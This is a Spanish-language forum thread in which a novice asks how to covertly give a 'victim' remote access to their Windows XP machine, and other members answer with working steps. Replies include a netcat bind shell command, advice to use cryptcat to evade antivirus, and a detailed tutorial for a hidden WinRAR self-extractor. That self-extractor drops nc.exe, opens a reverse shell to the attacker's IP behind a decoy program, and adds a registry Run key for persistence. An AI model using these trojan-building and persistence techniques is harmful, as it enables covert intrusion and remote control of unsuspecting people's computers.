Páginas: [1] 2 
|
 |
|
 Autor
|
Tema: Problema con Netcat (Leído 645 veces)
|
madeinjaes
 Desconectado
Mensajes: 125
madeinjaes
|
Despues de leerme los tropecientos tutoriales de Netcat, quiero hacer una cosa y no puedo, me explico. Quiero conectarme a un ordenador con Windows XP, sin Firewall, y sin ningun service pack a traves de su ip, pero claro necesito que el otro tenga el puerto 23 abierto, y tambien he leido que con netcat se puede. Si voy por el buen camino creo que lo k hay que hacer es enviarle a la victima netcat en un .bat, oculto que deberia unir con algun join. Para que cuado la victima ejecute tal archivo es su ordenador se abra el puerto 23 y tambien que cuando el abra el archivo se abra un archivo como una foto o alguna cancion para que no sospeche. P.D: perdon por mi ignorancia, pero estoy aprendiendo sobre hack, another newbie  Gracias de antemano y Saludos^^ |
|
|
|
|
En línea
|
http://bux.to/#r=mygmiljavi gana dinero por clicks no es dinero gratis , tu lo ganas haciendo cliks si no quieres que yo sea tu referente seras vendido sin darte cuenta por menos de 2 euros y todo lo que ganes sin tu perder nada ira a otra persona.
|
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
bueno si no quieres que sospeche, puedes mandale un autoextraible de winrar o manualmente (con un joiner) unir alguna aplicacion con el bat, netcat y lo del puerto, yo te recomiendo usar puertos comunmente usados, 80 21 1863 para que no salte el firewall  salu2 |
|
|
|
|
En línea
|
|
|
|
madeinjaes
Desconectado
Mensajes: 125
madeinjaes
|
bueno si no quieres que sospeche, puedes mandale un autoextraible de winrar o manualmente (con un joiner) unir alguna aplicacion con el bat, netcat y lo del puerto, yo te recomiendo usar puertos comunmente usados, 80 21 1863 para que no salte el firewall salu2 Si, tienes razon, pero es que necesito abriri el 23 para poder utilizar telnet. Y otra cosa, como podira configuarar el netcat, y enviarselo a la victima para que le abra tal puerto? Gracias de antemano y Saludos^^ |
|
|
|
|
En línea
|
http://bux.to/#r=mygmiljavi gana dinero por clicks no es dinero gratis , tu lo ganas haciendo cliks si no quieres que yo sea tu referente seras vendido sin darte cuenta por menos de 2 euros y todo lo que ganes sin tu perder nada ira a otra persona.
|
|
|
Novlucker
 Conectado
Mensajes: 1.581
|
Mi pregunta es... para que quieres abrir el puerto 23 para conectarte por telnet? porque no lo haces más fácil y obtienes la shell con el netcat? Lo único que tendrías que hacer es enviarle el netcat, unido con un *.bat por ejemplo, que se encargue de situar el nc en un sitio que no cante mucho y además que lo agregue al registro para que se inicie cada vez, como no tiene firewall también se te hace muy facil  |
|
|
|
« Última modificación: 13 Abril 2008, 23:13 por Novlucker »
|
En línea
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein |
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
con esa pregunta me surgio una duda  como abrir piertos desde un bat?? ^^ salu2 |
|
|
|
|
En línea
|
|
|
|
RockoX
Desconectado
Mensajes: 283
... L30 ...
|
Hola, si, como dices puedes enviarle el netcat, adjunto con una imagen para que no sospeche. Luego como dice Novlucker, es mas efectivo obtener la shell con netcat, que hacer un telnet al puerto abierto.. Bueno pero para abrir un puerto con Netcat es : nc -l -p Puerto -t -e cmd.exe PD: La mayoria de los antivirus, detecta a netcat. Asi que te recomiendo que uses cryptcat, que es exactamente lo mism, solo que todo esta encriptado. PD 2 : Cryptcat aun no es detectado por Nod32, Kaspersky si lo detecta. |
|
|
|
|
En línea
|
|
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
RockoX Netcat usa, no abre los puertos :/
los puertos los tienes que abrir desde windows.
estoy buscando como hacerlo desde un bat, pero no encuentro nada :/ sera imposible ??
saslu2
|
|
|
|
|
En línea
|
|
|
|
Novlucker
Conectado
Mensajes: 1.581
|
Bueno ,más que abrir puertos, se podría hablar de habilitar servicios, como es el caso de telnet, eso si se puede  |
|
|
|
|
En línea
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein |
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
si inicias telnet no te salta el contrafuegos ??? eso seria genial salu2 |
|
|
|
|
En línea
|
|
|
|
RockoX
Desconectado
Mensajes: 283
... L30 ...
|
Pues yo tengo entendido que abre los puertos.
Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOSTFuente : http://es.wikipedia.org/wiki/NetcatAbriendo los puertos de la manera que dije, luego escaneando la maquina con varios Scanners me sale que los puertos estan abiertos. Saludos. |
|
|
|
|
En línea
|
|
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
RockoX tienes razon, me eh confundido, yo lo tengo que hacer manual por el router :/ para habilitar TelNet puede hacerse subiendo por netcat un bat como este, espero que funcione @ echo off
cd c:\windows\system32\
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr.exe Start
exit EDITO: aun no se si funcione  p.d. salu2 |
|
|
|
« Última modificación: 14 Abril 2008, 06:33 por marlon_agz »
|
En línea
|
|
|
|
madeinjaes
Desconectado
Mensajes: 125
madeinjaes
|
RockoX tienes razon, me eh confundido, yo lo tengo que hacer manual por el router :/ para habilitar TelNet puede hacerse subiendo por netcat un bat como este, espero que funcione @ echo off
cd c:\windows\system32\
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr.exe Start
exit Lo voy a probar, pero una pregunta, cuando la victima ejecute tal .bat, podra ver que se abre y se cierra el MS-Dos? Otra cosa, com hago un .bat , para que cuando el lo abra se copien netcat a la carpeta System32? Y alguna manare para ejecutar todo esto en segundo plano y no se usar el cryptcat, que se supone que hay que hacer cuando lo tienes? Perdon por mi ignoriancio. Saludos y gracais de antemano^^ EDITO: aun no se si funcione p.d. salu2 |
|
|
|
|
En línea
|
http://bux.to/#r=mygmiljavi gana dinero por clicks no es dinero gratis , tu lo ganas haciendo cliks si no quieres que yo sea tu referente seras vendido sin darte cuenta por menos de 2 euros y todo lo que ganes sin tu perder nada ira a otra persona.
|
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
bueno si tiene que parpadear :/ pero olvidalo, no funciona :/ aunque inicies TelNet, pide confirmacion, el nombre de usuario y contrtaseña :/ para copiar netcat (suponiendo que ya esta en la otra pc) @echo
cd C:\Documents and Settings\panchito\Mis documentos
copy netcat.exe c:\windows\system32
exit pero si no le has enviado el netcat, pfff tendremos que leer otra vez los tutoriales o bueno aqui te pongo una mass facilota que le aprendi a WHK primero tener el Netcat y winrar... http://www.vulnwatch.org/netcat/nc111nt.ziphttp://www.winrar.es/descargas/52ahora, clic derecho al nc.exe ...  crearemos un autoextraible seleccionando la opcion "create a SFX archive" Opcionalmente puedes seleccionar delete files after... y compression method, yo puse la mejor (best) para que no quede muy pesado.  Ahora le das click a la pestaña advanced y abajito tiene una opcion que dice "SFX options" le das click y te aparece esta ventana...  Path to extract significa el directorio donde se va a descomprimir, por eso escribi "c:\windows\system32" y run after extraction, seria ejecutar despues de la extraccion escribimos nc.exe -d -e cmd.exe 192.168.1.67 80 nc.exe es para que ejecute el netcat inmediatamente se descomprima -d es para que se ejecute background o invisible -e es para ejecutar cmd.exe para que ejecute la consola 192.168.1.67 esta es mi ip en la red local, tu tienes que poner la tuya 80 es el puerto por donde conectara bueo ahora vamos a la ventana de modes, seleccionamos hide all para que no se vea la extraccion y overwrite, por si ya lo tenia, lo sobreescribira  ya por ultimo abrimos una consola, llamamos al nc y lo ponemos a la escucha  mandamos el archivo y una vez lo ejecuten...  asi seria una manera muy basica de obtener una shell o consola con netcat aer si te gusta si quieres darle un despiste puedes usar un joiner, pero mas facil seria que pusieras alguna aplicacion donde dice "Run Before Extraction" (ejecutar antes de la extraccion)  puedes poner mspaint.exe abrira el paint de windows freecell.exe el cartablanca winmine.exe buscaminas y hay otros pero no los recuerdo  salu2 p.d. si quieres practicar, mandame tu msn por privado, tengo una maquina virtual, justo para practicar  |
|
|
|
|
En línea
|
|
|
|
madeinjaes
Desconectado
Mensajes: 125
madeinjaes
|
 dios que dios, gracias por el tuto increible, pero tengo una duda más xD ¿despues una vex estoy dentro de su shell, que tengo que hacer para que se ejecute siempre que yo quiera, es en algo del registro, que ¿hay que poner? Saludos^^
|
|
|
|
|
En línea
|
http://bux.to/#r=mygmiljavi gana dinero por clicks no es dinero gratis , tu lo ganas haciendo cliks si no quieres que yo sea tu referente seras vendido sin darte cuenta por menos de 2 euros y todo lo que ganes sin tu perder nada ira a otra persona.
|
|
|
marlon_agz
Desconectado
Mensajes: 789
Encontre el origen de los Emos xD
|
donde dice "Run Before Extraction" escribes %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "nc" /t REG_SZ /d "c:\windows\system32\nc.exe -d -e cmd.exe 127.0.0.1 80" /f > nul cita de WHK Le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el NETCAT arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando. salu2 salu2 |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 2 
|
|
|
 |
